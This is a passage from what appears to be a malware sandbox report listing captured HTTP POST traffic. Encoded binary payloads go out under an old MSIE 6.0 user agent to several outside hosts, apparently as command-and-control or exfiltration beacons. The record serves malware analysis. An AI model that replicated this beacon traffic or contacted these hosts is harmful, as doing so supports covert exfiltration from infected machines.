61 65 30 77 49 5a 41 31 41 45 36 70 70 6e 6a 7a 39 54 65 50 36 70 79 53 79 33 77 78 56 38 75 65 56 6c 39 53 43 38 68 6d 36 30 61 53 6b 67 4b 48 70 31 71 46 49 63 59 78 65 6f 71 6c 61 61 65 38 2f 34 58 30 44 46 63 69 78 66 4d 31 63 54 62 4c 59 71 4a 30 56 37 66 7a 33 58 52 30 35 57 56 74 67 57 57 58 69 55 73 71 69 4f 6e 6e 74 31 35 66 34 77 48 74 61 32 6b 4c 4c 36 42 4b 7a 49 5a 46 74 58 7a 71 47 6c 4d 4a 41 68 56 51 5a 4c 61 69 31 73 66 76 2f 37 4e 32 34 5a 7a 38 48 4e 59 6b 49 4a 58 71 4f 48 69 78 44 55 77 39 35 78 47 73 34 77 4d 43 68 32 35 72 72 37 71 2f 34 44 38 71 53 50 69 6a 78 45 6d 72 59 55 51 45 72 32 41 6d 52 78 79 52 6e 62 4a 32 6d 4e 50 4f 4f 6b Data Ascii: 4IUryh2m4GJq9BjwVPDb/FY8qDrLr09WoTDQ6qXRjZsDi1CwruQe8nPVIAYETUw82E8ddj1ygDvJmYymMoTvIGg5r21awB5FXWQef+EbllX0AjGQe3VHTy04ToHlnZlg+nCrWwXb906mz4jvwqIMYz3oq7H3+Wobk1C+gOaIPv1vYO7kSmVIyQ3/Anvg5ExG5wM9mhw5TAOeSWVguFIPsocv+GRRuItZRhuxX7bW0udwSNPtf40IDoPEEqgLEpIZoH5At/PfyRad2r+95c2Cr8fg9aD9BuptU+iNBEkl1bUHk6gPzENBcxtEfzrUfyT3aqvKRdHzI86BgrrwdCFCBgeIqadLOzFEffErzslA9VWR892w60S9fSae0wIZA1AE6ppnjz9TeP6pySy3wxV8ueVl9SC8hm60aSkgKHp1qFIcYxeoqlaae8/4X0DFcixfM1cTbLYqJ0V7fz3XR05WVtgWWXiUsqiOnnt15f4wHta2kLL6BKzIZFtXzqGlMJAhVQZLai1sfv/7N24Zz8HNYkIJXqOHixDUw95xGs4wMCh25rr7q/4D8qSPijxEmrYUQEr2AmRxyRnbJ2mNPOOk
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 6d 77 69 62 30 66 44 6a 34 47 4a 76 30 45 30 55 41 79 59 63 48 36 50 67 4d 4d 79 59 61 51 6b 33 4a 46 70 33 78 75 46 78 44 4c 78 4c 61 45 76 35 57 78 53 73 36 59 6b 65 38 4a 46 35 4f 7a 73 30 73 62 61 2f 2f 47 79 6e 57 4c 38 41 2b 34 4e 41 53 5a 55 6b 6b 4f 39 62 2b 6a 2b 44 76 6d 6a 6b 71 42 51 4b 52 76 68 48 62 66 70 42 33 65 57 73 34 56 32 34 33 6a 30 75 51 2f 58 44 31 42 75 72 4b 69 4c 6f 71 35 57 48 55 2b 57 78 6d 59 4d 69 45 35 51 59 4b 2f 49 52 6c 6d 62 39 6f 36 37 61 37 6b 30 4d 6b 4a 64 73 79 46 52 61 77 71 35 44 63 41 49 57 64 6f 30 30 76 2f 4c 69 38 41 64 53 31 63 54 41 69 68 75 50 47 71 65 41 66 63 41 78 52 69 63 49 4f 6d 43 33 66 49 4e 4b 48 76 52 31 66 5a 49 4d 30 62 59 6f 50 69 6c 6f 78 37 66 70 35 6b 43 45 4d 2f 4d 47 76 30 30 53 6b 78 77 59 73 46 35 6f 48 4b 35 73 41 69 5a 53 64 6b 6f 42 5a 70 41 70 59 33 4c 6c 49 53 4d 79 6b 38 71 41 75 55 43 6d 6c 61 55 72 77 78 30 2b 34 4a 37 74 57 64 39 6a 43 6c 44 6d 30 6c 32 6c 5a 43 58 5a 30 32 64 54 49 61 7a 33 6c 46 4a 63 73 75 70 76 45 54 49 5a 44 6b 6c 50 5a 51 51 59 72 48 39 52 6b 45 43 67 76 6b 6f 48 5a 4f 73 37 66 77 38 6f 4b 6f 7a 70 77 77 39 4d 74 71 72 6f 53 34 49 2b 50 68 71 6e 6e 61 39 46 4b 31 71 77 72 6f 4d 56 32 4c 79 75 62 34 44 75 52 39 50 53 48 53 57 4d 71 4b 61 51 55 59 4e 56 6a 7a 46 6d 4a 4f 44 37 68 51 7a 78 66 31 73 70 58 51 35 72 65 36 47 74 43 4e 74 64 46 31 6e 73 47 72 4b 62 69 34 77 43 4d 56 64 54 33 33 34 4d 55 49 34 65 30 2b 7a 6f 58 74 6c 58 41 52 4d 2f 74 45 59 44 6f 73 70 4f 71 52 57 63 55 5a 6a 4f 76 78 57 4d 66 2f 43 52 59 51 72 30 4c 6e 72 66 47 66 32 79 2b 43 6b 6c 6b 76 68 7a 7a 52 68 7a 39 4e 63 53 74 70 4f 52 5a 33 30 39 69 6c 44 39 7a 77 4d 31 64 73 53 65 37 33 4a 78 58 38 69 39 2b 52 42 78 4b 74 4a 38 70 79 34 3d Data Ascii: mwib0fDj4GJv0E0UAyYcH6PgMMyYaQk3JFp3xuFxDLxLaEv5WxSs6Yke8JF5Ozs0sba//GynWL8A+4NASZUkkO9b+j+DvmjkqBQKRvhHbfpB3eWs4V243j0uQ/XD1BurKiLoq5WHU+WxmYMiE5QYK/IRlmb9o67a7k0MkJdsyFRawq5DcAIWdo00v/Li8AdS1cTAihuPGqeAfcAxRicIOmC3fINKHvR1fZIM0bYoPilox7fp5kCEM/MGv00SkxwYsF5oHK5sAiZSdkoBZpApY3LlISMyk8qAuUCmlaUrwx0+4J7tWd9jClDm0l2lZCXZ02dTIaz3lFJcsupvETIZDklPZQQYrH9RkECgvkoHZOs7fw8oKozpww9MtqroS4I+Phqnna9FK1qwroMV2Lyub4DuR9PSHSWMqKaQUYNVjzFmJOD7hQzxf1spXQ5re6GtCNtdF1nsGrKbi4wCMVdT334MUI4e0+zoXtlXARM/tEYDospOqRWcUZjOvxWMf/CRYQr0LnrfGf2y+CklkvhzzRhz9NcStpORZ309ilD9zwM1dsSe73JxX8i9+RBxKtJ8py4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 54 52 30 6f 31 73 51 4a 34 57 4a 69 70 6f 46 62 33 34 72 6b 33 35 63 4a 51 69 7a 38 4a 51 33 75 4f 42 50 6a 50 63 76 68 72 6f 76 79 72 66 30 51 35 70 4b 4e 6b 79 51 4a 64 76 34 2b 2f 33 76 67 36 79 65 4e 67 36 49 36 42 4e 4d 51 61 6d 44 39 52 64 78 6d 50 4a 41 61 78 57 59 57 77 47 4b 59 6f 55 53 75 55 4d 32 48 59 45 71 62 33 37 61 43 66 77 47 4c 6e 59 54 54 58 35 78 38 69 31 6a 58 32 31 4a 7a 46 4e 74 4d 77 33 79 38 4d 50 6c 48 79 34 57 47 50 42 65 77 77 70 43 45 50 4e 56 30 52 57 2b 54 78 37 43 78 76 71 65 58 6f 55 36 49 6b 66 35 31 62 33 6a 2f 2f 36 62 2b 64 4e 71 52 64 62 50 69 5a 39 6d 43 2f 73 4b 58 6c 64 56 63 63 2b 76 64 41 30 67 46 73 47 73 34 30 39 68 4a 7a 76 76 35 61 66 4b 6d 4b 34 35 51 43 6b 33 76 77 74 4e 48 51 59 68 6c 73 35 54 69 2f 51 54 69 76 30 2b 61 59 4a 64 6a 4d 39 47 67 37 44 6b 32 73 4e 53 32 58 6f 35 67 44 33 6f 34 61 79 37 75 63 30 49 30 65 68 42 39 78 53 71 61 46 6a 49 58 76 44 4d 68 48 4f 4b 54 2f 65 37 65 65 61 32 76 63 41 6f 78 45 35 4d 49 61 69 5a 52 41 35 78 69 6b 5a 77 43 39 35 4d 77 35 67 4d 30 4e 58 2b 51 4f 39 32 4e 74 31 55 33 7a 2f 36 6d 65 30 73 57 4b 46 64 45 2f 67 64 78 79 6e 4d 53 5a 4d 4c 76 38 45 6c 72 71 38 78 70 52 32 4d 49 6f 36 52 34 2f 78 6d 75 31 48 30 72 4a 46 73 31 49 75 59 57 79 72 2f 30 51 53 50 56 47 34 35 42 52 4a 37 49 38 31 2b 34 51 6a 70 4a 30 33 66 44 71 56 74 4f 6c 77 42 39 41 31 65 49 7a 32 56 72 2f 63 4b 63 5a 39 45 41 4f 46 78 65 76 49 6c 68 53 61 64 4a 35 65 6c 44 51 79 35 55 34 63 67 79 61 62 76 7a 4f 69 79 78 4b 4d 39 4d 76 78 69 48 65 70 58 67 46 46 37 49 6d 59 68 7a 68 70 6e 52 73 59 78 44 78 4d 64 7a 41 38 61 49 36 70 73 71 31 71 46 47 70 33 4d 53 70 6c 51 48 54 4a 75 68 43 55 49 70 58 70 63 30 4c 50 34 3d Data Ascii: TR0o1sQJ4WJipoFb34rk35cJQiz8JQ3uOBPjPcvhrovyrf0Q5pKNkyQJdv4+/3vg6yeNg6I6BNMQamD9RdxmPJAaxWYWwGKYoUSuUM2HYEqb37aCfwGLnYTTX5x8i1jX21JzFNtMw3y8MPlHy4WGPBewwpCEPNV0RW+Tx7CxvqeXoU6Ikf51b3j//6b+dNqRdbPiZ9mC/sKXldVcc+vdA0gFsGs409hJzvv5afKmK45QCk3vwtNHQYhls5Ti/QTiv0+aYJdjM9Gg7Dk2sNS2Xo5gD3o4ay7uc0I0ehB9xSqaFjIXvDMhHOKT/e7eea2vcAoxE5MIaiZRA5xikZwC95Mw5gM0NX+QO92Nt1U3z/6me0sWKFdE/gdxynMSZMLv8Elrq8xpR2MIo6R4/xmu1H0rJFs1IuYWyr/0QSPVG45BRJ7I81+4QjpJ03fDqVtOlwB9A1eIz2Vr/cKcZ9EAOFxevIlhSadJ5elDQy5U4cgyabvzOiyxKM9MvxiHepXgFF7ImYhzhpnRsYxDxMdzA8aI6psq1qFGp3MSplQHTJuhCUIpXpc0LP4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 31 78 75 4b 6d 70 36 36 37 32 49 39 56 30 37 64 36 57 46 6b 41 49 45 68 4d 38 50 65 71 4b 7a 39 73 6a 7a 55 79 49 6a 7a 6a 31 4d 77 44 49 4a 32 67 55 47 6a 6d 65 4e 68 4b 47 54 56 34 76 68 57 42 47 74 33 41 67 52 4b 71 46 31 62 53 50 49 77 6d 77 59 76 68 71 6d 6a 31 45 4c 6e 44 79 4b 52 36 4c 46 62 34 66 67 62 59 2f 68 38 6b 67 33 6e 6d 61 48 34 59 77 49 42 53 70 2f 78 54 36 45 36 4f 55 67 66 6d 42 32 53 4b 5a 39 77 32 5a 36 63 6b 75 4a 55 70 6b 45 32 64 76 46 2f 65 44 51 35 73 48 52 78 66 67 4f 4b 49 33 38 69 34 56 36 32 47 76 70 50 56 5a 2b 5a 38 58 73 2f 47 4a 54 56 30 6a 73 4f 31 57 6c 48 38 65 39 48 6d 69 37 58 37 41 58 45 6a 6e 68 73 6e 49 52 71 49 36 35 5a 34 44 63 34 70 51 6c 56 30 75 6f 61 68 6e 75 41 75 76 37 76 6e 68 70 4c 44 54 70 59 4f 72 59 51 30 6d 6e 72 6e 41 43 59 58 39 54 76 79 33 78 6d 42 4e 70 6f 6e 4e 44 37 52 34 76 69 48 34 51 6c 42 4c 72 69 54 7a 6e 45 36 41 33 7a 6c 4e 78 35 46 2b 43 39 6e 47 39 66 66 43 58 69 71 6a 4c 6d 6d 4e 78 67 79 69 2f 75 58 54 73 65 4d 77 57 51 6c 30 46 43 70 76 71 59 36 70 56 43 4b 67 61 48 67 65 2f 31 35 73 2f 48 6e 42 2b 77 4c 44 34 55 73 4b 42 30 30 6f 6a 42 76 4c 43 34 47 6d 41 31 59 77 79 34 6d 2f 6b 44 41 68 69 32 6b 31 57 4e 64 72 79 50 51 37 36 43 33 32 71 4e 45 72 44 65 44 6a 2f 72 77 52 50 78 4a 6a 6b 69 4e 2b 35 59 30 6c 33 75 4b 4a 5a 58 7a 6b 30 66 4e 49 51 4a 5a 52 45 56 5a 59 4b 75 33 6a 44 7a 49 6b 38 55 70 75 33 72 4f 57 4b 51 70 6c 4b 38 61 66 74 63 66 39 6f 45 75 6e 6a 65 37 4a 35 6d 55 51 4c 6f 2f 49 66 77 71 42 54 69 64 33 6f 66 70 56 69 6a 4d 6b 65 79 79 34 49 66 64 47 2f 67 79 59 2b 56 48 45 70 68 46 6e 72 47 37 42 77 4c 49 32 30 74 51 39 31 33 51 4a 6b 6e 72 4e 33 54 46 50 46 73 35 42 77 51 58 7a 5a 6d 6e 51 59 4b 2f 6a 32 66 70 52 32 38 69 4f 39 46 41 51 68 79 49 41 75 69 53 57 61 67 56 77 3d 3d Data Ascii: 1xuKmp6672I9V07d6WFkAIEhM8PeqKz9sjzUyIjzj1MwDIJ2gUGjmeNhKGTV4vhWBGt3AgRKqF1bSPIwmwYvhqmj1ELnDyKR6LFb4fgbY/h8kg3nmaH4YwIBSp/xT6E6OUgfmB2SKZ9w2Z6ckuJUpkE2dvF/eDQ5sHRxfgOKI38i4V62GvpPVZ+Z8Xs/GJTV0jsO1WlH8e9Hmi7X7AXEjnhsnIRqI65Z4Dc4pQlV0uoahnuAuv7vnhpLDTpYOrYQ0mnrnACYX9Tvy3xmBNponND7R4viH4QlBLriTznE6A3zlNx5F+C9nG9ffCXiqjLmmNxgyi/uXTseMwWQl0FCpvqY6pVCKgaHge/15s/HnB+wLD4UsKB00ojBvLC4GmA1Ywy4m/kDAhi2k1WNdryPQ76C32qNErDeDj/rwRPxJjkiN+5Y0l3uKJZXzk0fNIQJZREVZYKu3jDzIk8Upu3rOWKQplK8aftcf9oEunje7J5mUQLo/IfwqBTid3ofpVijMkeyy4IfdG/gyY+VHEphFnrG7BwLI20tQ913QJknrN3TFPFs5BwQXzZmnQYK/j2fpR28iO9FAQhyIAuiSWagVw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 4d 2f 44 37 6f 44 4c 77 37 32 4a 2b 6f 4f 68 72 5a 52 45 30 55 54 57 77 39 39 6f 43 30 42 64 7a 68 74 6b 2f 67 49 30 37 4c 61 58 45 65 62 7a 43 43 56 4f 54 4f 44 72 36 49 6c 66 79 5a 6f 6b 50 6d 75 78 71 76 68 75 6e 63 31 61 73 58 46 47 2f 62 36 44 6f 44 78 56 56 43 69 38 6f 4b 37 6e 72 77 59 7a 4a 31 55 63 39 6b 4a 49 51 4f 4d 6d 6b 4a 77 54 56 33 62 4d 47 44 6f 44 52 71 55 62 50 31 4a 68 50 50 70 6d 52 54 4b 69 67 36 37 4e 37 6e 44 38 45 4b 73 67 6d 7a 64 4f 52 77 73 43 59 4a 6a 55 6c 43 55 51 42 32 6c 69 5a 79 4b 4b 51 36 4e 36 61 56 2f 43 58 56 78 35 6f 58 52 4b 50 65 61 31 69 33 58 35 63 38 65 61 76 69 31 55 59 38 47 68 7a 31 58 69 5a 43 62 4f 31 7a 65 54 6b 4a 41 39 74 32 75 56 62 61 6c 54 4b 4a 77 68 47 36 57 34 49 55 59 4e 51 43 39 4f 4a 78 4f 47 63 35 52 73 61 74 50 61 42 37 55 48 64 78 30 30 59 46 2b 6f 73 73 34 6f 66 77 78 56 76 6e 77 6c 50 42 39 77 46 75 6a 36 32 73 2b 73 30 4c 2b 32 59 2f 6b 62 30 73 6b 67 38 44 6b 6c 58 52 59 56 77 54 67 47 4a 6b 43 41 47 67 78 2f 45 75 39 53 6d 5a 4e 6b 38 6c 38 32 30 77 56 2b 7a 70 56 4e 77 7a 70 64 33 47 39 5a 68 4e 36 6f 77 6f 32 62 65 33 36 73 6e 78 52 62 6f 32 58 6b 37 37 33 33 36 48 77 4c 44 33 5a 75 62 4b 6b 6b 52 56 61 67 4c 77 33 76 43 2b 6e 79 62 4b 38 5a 68 48 75 2f 74 56 58 6e 2b 75 55 32 53 70 43 36 64 54 34 4f 78 32 58 50 77 76 33 69 67 58 6a 55 46 4b 65 67 50 7a 34 75 64 4e 66 56 55 58 59 58 63 6c 43 43 6a 48 48 33 36 64 54 36 5a 39 38 33 41 44 55 66 73 45 73 45 38 73 49 32 54 38 68 31 4d 61 65 64 6d 63 46 6b 42 5a 57 62 43 64 75 33 54 4d 41 75 31 53 2f 6c 6b 63 5a 53 4c 49 61 4f 38 38 57 36 35 5a 44 47 68 50 71 58 76 44 2f 4f 49 4a 76 78 46 4b 31 47 52 49 55 5a 46 57 6b 36 4c 37 38 33 73 73 4d 38 47 58 6d 78 6f 36 51 46 77 Data Ascii: M/D7oDLw72J+oOhrZRE0UTWw99oC0Bdzhtk/gI07LaXEebzCCVOTODr6IlfyZokPmuxqvhunc1asXFG/b6DoDxVVCi8oK7nrwYzJ1Uc9kJIQOMmkJwTV3bMGDoDRqUbP1JhPPpmRTKig67N7nD8EKsgmzdORwsCYJjUlCUQB2liZyKKQ6N6aV/CXVx5oXRKPea1i3X5c8eavi1UY8Ghz1XiZCbO1zeTkJA9t2uVbalTKJwhG6W4IUYNQC9OJxOGc5RsatPaB7UHdx00YF+oss4ofwxVvnwlPB9wFuj62s+s0L+2Y/kb0skg8DklXRYVwTgGJkCAGgx/Eu9SmZNk8l820wV+zpVNwzpd3G9ZhN6owo2be36snxRbo2Xk77336HwLD3ZubKkkRVagLw3vC+nybK8ZhHu/tVXn+uU2SpC6dT4Ox2XPwv3igXjUFKegPz4udNfVUXYXclCCjHH36dT6Z983ADUfsEsE8sI2T8h1MaedmcFkBZWbCdu3TMAu1S/lkcZSLIaO88W65ZDGhPqXvD/OIJvxFK1GRIUZFWk6L783ssM8GXmxo6QFw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 4d 66 4d 7a 76 2f 4a 4b 34 47 4c 2f 56 74 48 38 4a 53 31 52 38 66 57 59 51 45 76 43 59 55 6a 75 52 6f 41 47 2f 75 48 39 4a 64 6f 2b 53 6d 75 39 79 53 35 67 57 45 69 64 30 31 41 37 4b 77 54 6b 4d 33 34 75 41 58 67 4f 62 58 67 32 42 4b 34 2f 63 79 36 45 74 43 61 6d 6e 48 4c 48 49 79 32 69 6c 48 46 35 4b 42 5a 74 55 70 64 75 38 41 55 49 6f 64 4f 52 2b 64 33 62 72 77 79 58 63 54 61 54 4c 51 4c 53 37 4f 68 4a 35 4f 65 65 62 64 46 50 6d 73 74 4d 4e 55 4e 62 6e 50 51 56 66 6c 2f 49 47 78 4a 44 78 4c 78 4d 53 32 72 4e 49 48 35 48 73 36 5a 59 33 57 68 6f 45 56 47 46 31 39 72 69 6f 75 6a 42 53 73 6d 4d 4f 56 6b 39 6b 73 6f 37 70 50 7a 38 7a 32 34 4c 30 6c 48 4c 4d 78 4f 2b 61 76 37 75 30 4b 53 37 78 72 79 4c 67 72 37 69 36 2f 54 2b 2b 6c 53 48 46 71 64 32 71 55 33 63 6b 55 72 76 73 63 67 67 35 64 32 4c 77 47 45 56 6c 45 58 57 48 6c 76 63 44 69 4a 67 2b 5a 78 52 68 69 62 58 55 7a 33 79 64 43 68 45 30 72 2b 38 37 58 35 63 2b 7a 31 6a 2f 45 43 53 73 35 31 76 39 2b 59 6d 42 48 36 33 63 70 66 39 31 68 30 38 53 6a 6c 35 39 7a 49 56 36 56 37 37 44 33 52 74 54 64 6a 4b 54 72 6b 49 4e 59 78 64 56 31 72 43 47 2b 31 38 54 4a 77 59 6d 73 4a 47 43 71 77 73 7a 4f 4b 57 6a 71 53 2f 33 77 72 4e 47 4c 68 44 54 2f 64 45 7a 4b 71 72 58 46 47 7a 6d 68 73 50 72 69 39 53 51 6b 42 73 6b 4b 72 65 45 49 72 58 6a 4e 73 77 4c 41 41 57 76 6b 7a 35 62 79 70 46 42 38 51 58 56 51 79 4b 55 4c 75 7a 41 67 54 4b 59 48 65 2b 4a 77 59 54 58 36 64 35 42 6c 4a 6c 4a 49 45 4e 33 31 51 4c 70 32 61 51 6d 4e 71 75 56 78 52 4c 2b 38 65 66 30 58 41 67 45 65 35 6e 6e 75 59 6b 31 45 41 6f 50 79 6c 6e 4b 69 61 48 76 64 70 37 2b 31 55 4c 68 2b 6d 4f 44 56 33 2f 47 76 42 72 6a 41 36 79 4d 43 51 76 6a 64 6a 55 61 53 34 37 70 59 7a 54 4c 32 30 35 59 66 4c 63 2b 78 37 62 54 69 67 77 57 31 6b 4f Data Ascii: MfMzv/JK4GL/VtH8JS1R8fWYQEvCYUjuRoAG/uH9Jdo+Smu9yS5gWEid01A7KwTkM34uAXgObXg2BK4/cy6EtCamnHLHIy2ilHF5KBZtUpdu8AUIodOR+d3brwyXcTaTLQLS7OhJ5OeebdFPmstMNUNbnPQVfl/IGxJDxLxMS2rNIH5Hs6ZY3WhoEVGF19rioujBSsmMOVk9kso7pPz8z24L0lHLMxO+av7u0KS7xryLgr7i6/T++lSHFqd2qU3ckUrvscgg5d2LwGEVlEXWHlvcDiJg+ZxRhibXUz3ydChE0r+87X5c+z1j/ECSs51v9+YmBH63cpf91h08Sjl59zIV6V77D3RtTdjKTrkINYxdV1rCG+18TJwYmsJGCqwszOKWjqS/3wrNGLhDT/dEzKqrXFGzmhsPri9SQkBskKreEIrXjNswLAAWvkz5bypFB8QXVQyKULuzAgTKYHe+JwYTX6d5BlJlJIEN31QLp2aQmNquVxRL+8ef0XAgEe5nnuYk1EAoPylnKiaHvdp7+1ULh+mODV3/GvBrjA6yMCQvjdjUaS47pYzTL205YfLc+x7bTigwW1kO
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 74 34 63 46 57 70 6d 77 5a 70 76 7a 2f 65 50 67 71 4f 48 7a 53 54 4b 34 43 53 62 33 30 52 67 36 33 63 7a 4f 4d 67 68 43 67 56 64 42 58 39 63 4e 38 6a 69 50 6c 2f 38 51 6e 69 4d 70 79 66 77 42 34 43 2f 51 71 6a 76 4a 36 55 71 38 49 49 44 66 44 57 55 57 43 4c 33 44 5a 79 35 42 46 7a 4a 48 49 63 36 39 58 65 6d 70 63 38 44 39 6e 62 5a 6e 41 6c 56 58 53 37 66 67 73 48 61 6a 76 69 79 43 71 49 37 4f 37 7a 69 71 34 50 79 68 66 77 48 2f 49 65 38 4d 52 48 35 67 6c 44 35 62 46 79 73 6a 30 41 5a 34 65 65 2b 42 4f 77 50 69 56 30 35 34 51 69 4e 65 70 6a 44 43 63 31 6d 78 73 53 43 30 70 57 37 6a 5a 4d 4b 41 6b 68 5a 77 56 65 4a 79 4a 31 7a 6d 53 59 50 54 50 65 77 72 75 39 50 50 33 79 2f 75 4b 4e 56 58 30 7a 55 41 36 4f 65 6a 37 34 57 4b 32 63 6a 52 31 74 47 66 46 31 57 7a 4d 74 34 50 50 54 44 61 68 5a 6f 75 63 77 37 30 43 70 49 7a 72 2f 46 79 32 54 39 4b 79 46 7a 6e 55 35 63 30 5a 75 46 32 61 37 33 61 4b 39 79 4b 47 54 61 78 63 63 64 71 38 47 6b 63 35 59 30 2b 39 50 2f 65 33 51 5a 52 33 4d 55 6e 66 4f 75 57 73 59 30 4b 36 36 37 37 76 45 67 34 63 4c 44 2f 4f 33 56 37 6c 50 79 4d 67 47 4c 49 30 4a 79 71 75 48 67 73 6e 42 56 32 51 53 4e 32 37 36 42 48 58 74 49 5a 43 42 37 6f 38 50 55 30 6c 75 56 4e 6c 37 64 75 73 53 43 53 42 51 33 49 6d 34 76 35 31 4f 4b 46 7a 70 2b 41 70 4c 32 55 36 65 4f 35 35 5a 52 70 72 52 69 69 4d 37 46 56 57 76 79 4e 79 44 38 32 50 72 76 56 6f 72 52 6c 4c 4a 36 58 33 42 78 69 76 35 69 76 63 36 65 70 71 54 4f 68 66 4c 79 6d 6c 75 74 54 74 67 4b 70 33 58 63 50 35 72 79 57 4b 47 2f 74 5a 58 72 63 46 61 7a 34 35 49 44 58 39 51 73 6d 35 33 2f 45 4b 4b 74 76 75 63 39 39 62 53 2b 6b 38 7a 64 71 6d 54 2b 71 7a 79 59 78 54 65 42 67 73 4a 42 55 6e 41 72 59 65 75 6e 5a 73 6e 73 73 70 63 54 45 47 36 51 3d Data Ascii: t4cFWpmwZpvz/ePgqOHzSTK4CSb30Rg63czOMghCgVdBX9cN8jiPl/8QniMpyfwB4C/QqjvJ6Uq8IIDfDWUWCL3DZy5BFzJHIc69Xempc8D9nbZnAlVXS7fgsHajviyCqI7O7ziq4PyhfwH/Ie8MRH5glD5bFysj0AZ4ee+BOwPiV054QiNepjDCc1mxsSC0pW7jZMKAkhZwVeJyJ1zmSYPTPewru9PP3y/uKNVX0zUA6Oej74WK2cjR1tGfF1WzMt4PPTDahZoucw70CpIzr/Fy2T9KyFznU5c0ZuF2a73aK9yKGTaxccdq8Gkc5Y0+9P/e3QZR3MUnfOuWsY0K6677vEg4cLD/O3V7lPyMgGLI0JyquHgsnBV2QSN276BHXtIZCB7o8PU0luVNl7dusSCSBQ3Im4v51OKFzp+ApL2U6eO55ZRprRiiM7FVWvyNyD82PrvVorRlLJ6X3Bxiv5ivc6epqTOhfLymlutTtgKp3XcP5ryWKG/tZXrcFaz45IDX9Qsm53/EKKtvuc99bS+k8zdqmT+qzyYxTeBgsJBUnArYeunZsnsspcTEG6Q=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 4d 2f 44 37 6f 44 4c 77 37 32 4a 2b 6f 4f 68 72 5a 52 45 30 55 54 57 77 39 39 6f 43 30 42 64 7a 68 74 6b 2f 67 49 30 37 4c 61 58 45 65 62 7a 43 43 56 4f 54 4f 44 72 36 49 6c 66 79 5a 6f 6b 50 6d 75 78 71 76 68 75 6e 63 31 61 73 58 46 47 2f 62 36 44 6f 44 78 56 56 43 69 38 6f 4b 37 6e 72 77 59 7a 4a 31 55 63 39 6b 4a 49 51 4f 4d 6d 6b 4a 77 54 56 33 62 4d 47 44 6f 44 52 71 55 62 50 31 4a 68 50 50 70 6d 52 54 4b 69 67 36 37 4e 37 6e 44 38 45 4b 73 67 6d 7a 64 4f 52 77 73 43 59 4a 6a 55 6c 43 55 51 42 32 6c 69 5a 79 4b 4b 51 36 4e 36 61 56 2f 43 58 56 78 35 6f 58 52 4b 50 65 61 31 69 33 58 35 63 38 65 61 76 69 31 55 59 38 47 68 7a 31 58 69 5a 43 62 4f 31 7a 65 54 6b 4a 41 39 74 32 75 56 62 61 6c 54 4b 4a 77 68 47 36 57 34 49 55 59 4e 51 43 39 4f 4a 78 4f 47 63 35 52 73 61 74 50 61 42 37 55 48 64 78 30 30 59 46 2b 6f 73 73 34 6f 66 77 78 56 76 6e 77 6c 50 42 39 77 46 75 6a 36 32 73 2b 73 30 4c 2b 32 59 2f 6b 62 30 73 6b 67 38 44 6b 6c 58 52 59 56 77 54 67 47 4a 6b 43 41 47 67 78 2f 45 75 39 53 6d 5a 4e 6b 38 6c 38 32 30 77 56 2b 7a 70 56 4e 77 7a 70 64 33 47 39 5a 68 4e 36 6f 77 6f 32 62 65 33 36 73 6e 78 52 62 6f 32 58 6b 37 37 33 33 36 48 77 4c 44 33 5a 75 62 4b 6b 6b 52 56 61 67 4c 77 33 76 43 2b 6e 79 62 4b 38 5a 68 48 75 2f 74 56 58 6e 2b 75 55 32 53 70 43 36 64 54 34 4f 78 32 58 50 77 76 33 69 67 58 6a 55 46 4b 65 67 50 7a 34 75 64 4e 66 56 55 58 59 58 63 6c 43 43 6a 48 48 33 36 64 54 36 5a 39 38 33 41 44 55 66 73 45 73 45 38 73 49 32 54 38 68 31 4d 61 65 64 6d 63 46 6b 42 5a 57 62 43 64 75 33 54 4d 41 75 31 53 2f 6c 6b 63 5a 53 4c 49 61 4f 38 38 57 36 35 5a 44 47 68 50 71 58 76 44 2f 4f 49 4a 76 78 46 4b 31 47 52 49 55 5a 46 57 6b 36 4c 37 38 33 73 73 4d 38 47 58 6d 78 6f 36 51 46 77 Data Ascii: 